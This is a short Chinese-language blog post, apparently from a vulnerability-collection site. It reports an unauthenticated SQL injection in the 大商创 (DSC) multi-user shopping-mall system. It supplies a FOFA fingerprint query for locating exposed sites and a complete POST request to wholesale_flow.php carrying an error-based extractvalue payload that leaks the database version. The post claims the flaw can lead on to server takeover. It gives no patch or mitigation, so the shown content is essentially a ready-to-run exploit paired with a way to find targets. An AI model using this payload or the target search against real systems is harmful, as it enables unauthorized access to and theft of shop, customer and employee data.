Babing
Published on 2024-08-30 / 2 Visits
0
0

D17-2大商创-多用户商城系统-SQL

D17-2大商创-多用户商城系统-SQL

漏洞描述:

大商创多用户商城系统 ajax_dialog.php、wholesale_flow.php等接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。

网站图片:

image-20240621105922838

网络测绘:

fofa语法:

FOFA:body=“dsc-choie”

漏洞复现:

payload:

POST /wholesale_flow.php?step=ajax_update_cart HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

rec_ids[]=extractvalue(1,concat(0x7e,version()))

效果图:
查询数据库版本


Comment